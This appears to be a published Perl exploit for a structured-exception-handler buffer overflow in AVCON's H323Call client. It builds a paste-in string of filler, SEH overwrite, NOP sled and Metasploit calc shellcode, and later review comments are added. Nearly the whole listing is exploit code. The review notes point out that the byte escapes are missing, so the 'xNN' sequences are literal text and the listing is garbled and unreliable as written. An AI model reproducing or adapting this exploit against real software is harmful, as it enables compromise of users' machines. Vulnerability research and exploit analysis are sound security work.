# Title : AVCON H323Call Buffer Overflow
# Published : 2010-05-07
# Author : Dillon Beresford
#!/usr/bin/perl
# Exploit Title: AVCON H323Call Buffer Overflow
# Date: 5/9/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Versions: 4.6.8.7 | 4.6.4.0
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Download: http://meeting.bjhr.gov.cn/avcon/avcon.exe
# Download: http://meeting.cei.gov.cn/avcon/avcon.exe
# Proof-of-concept file generator. The script only assembles a fixed string
# in memory and writes it to a local file; it opens no network connection
# and launches no process. The file is then pasted into the target's input
# field by hand (see the EDB notes below).
#
# NOTE(review): no backslash appears anywhere in this listing, so every
# "xNN" below is the literal three-character text `xNN`, not a byte; the
# emitted file is plain printable ASCII rather than the bytes the comments
# describe. This looks like an extraction artifact of the page -- confirm
# against the original before treating either form as the reference sample.
my $exploit = "poc.txt";   # output path, relative to the current working directory
## EDB Test Notes:
## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" -> select H323 Call
## or just run "H323Call.exe" located inside installation folder,
## copy and paste the exploit (string) to the input field (there's only one),
## and click on "call". (this is a different flaw in the software package affects H323Call).
# Layout, per the variable names, is the usual SEH-overwrite shape:
# filler, next-SEH record, SEH handler address, NOP sled, payload, trailing padding.
my $junk = "x41" x 1019;              # as written: the text "x41" repeated 1019 times
my $nSEH = "xebx08x90x90";            # next-SEH slot (text as written, see note above)
my $SEH = pack('V',0x1005FE29);       # handler slot; pack 'V' = 32-bit little-endian unsigned
my $nops = "x90" x 25;                # NOP sled as labelled; text as written
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
# Payload body taken from the Metasploit output described above. The same
# missing-escape caveat applies: concatenated here as literal text.
my $buf =
"x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4" .
"xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2" .
"x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29" .
"xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee" .
"x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c" .
"x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6" .
"xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47" .
"x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf" .
"xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99" .
"x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3" .
"x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22" .
"x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3" .
"x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae" .
"x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4" .
"x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b" .
"x97x2dx30x18xa5xbex86x7b";
my $padding = "E" x 5000;             # trailing filler: 5000 literal 'E' characters
# Final string, concatenated in the order listed at the top.
my $payload = $junk.$nSEH.$SEH.$nops.$buf.$padding;
# NOTE(review): two-argument open on a bareword handle with an interpolated
# filename, and neither open() nor close() is checked. The idiomatic form is
#   open my $fh, '>', $exploit or die "open $exploit: $!";
#   ... close $fh or die "close $exploit: $!";
# Left byte-identical here; a failed open silently produces no file.
open (myfile,">$exploit");
print myfile $payload;
close (myfile);